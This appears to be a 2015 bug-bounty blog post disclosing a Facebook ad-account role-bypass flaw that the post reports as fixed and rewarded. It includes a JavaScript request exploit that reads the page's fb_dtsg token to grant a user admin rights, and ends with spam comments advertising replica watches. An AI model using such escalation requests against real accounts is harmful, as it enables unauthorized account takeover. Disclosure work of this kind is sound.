Sunday, March 15, 2015

Bypass ad account roles vulnerability 2015


  3 comments

facebook exploit 2015





I discovered a vulnerability in Facebook that allowed a normal user in ad account to get unauthorized admin access in that ad account

admins in ad account  can add any user to their ad account with these 3 type of  role :

  1. admin
  2. advertiser
  3. analyst
read more about these roles link

Facebook launched business manager in 2014 to help businesses and agencies manage their Facebook Pages , that can be accessible from business.facebook.com

in Facebook business manager, a business account can assign agencies for own ad accounts
so that agencies give access to ad accounts with limited access(owner set this access in assign agency process)


the vulnerability that I found, allow these agencies with normal role(2,3)  change their own access to admin!

Scenario :


I have business account and I give analyst permission to another business account to work on my ad account!
that business account can bypass roles and get admin access!



Details:


with analyst permission in any ad account send this request :

request url : facebook.com/ads/manage/settings/permissions/?action=add_user

request body :

act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission : 1001 admin, 1002 advertiser, 1003 analyst ]

Exploit :


var Xhr;
Xhr = new XMLHttpRequest ();
Xhr.open("POST","/ads/manage/settings/permissions/?action=add_user",true);
var p = "act=__ACCID__&user_id=__USERID__&add_user_permission=__PERM__&__a=1";
p += "fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;
Xhr.send(p);
__ACCID__ = ad account id
__USERID__ = this user will be new admin ;)
__PERM__ = permission (1001,1002,1003)

POC : 

 I removed some section that used userid or email





Timeline: 



  •  Mar 14, 2015 01:27am: Initial report
  •  Mar 17, 2015 03:35am: Bug acknowledged by security team
  •  Mar 17, 2015 08:00am: Security team member Reginaldo informed me the vulnerability fixed
  •  Mar 20, 2015 10:08pm: Facebook Security Team rewarded me with a $8000.




3 comments :

  1. Ich kaufte eine Kopie dieser Uhr für meinen Freund in diesem Online-Shop. Mein Freund liebt es. Er rühmte sich, dass diese Uhr fantastisch ist.
    luxury copy watches
    luxury watches
    copy watches

    ReplyDelete
  2. Ik gebruik dit replica horloge is een zeer mooi en betaalbaar automatisch horloge, goede maat, Winkel voor luxe horlogeshoge kwaliteit,replica breitling horloges elegant en temperament, het is mijn favoriete stijl. Ik heb deze site gedeeld met mijn vrienden en ze waren erg blij.

    ReplyDelete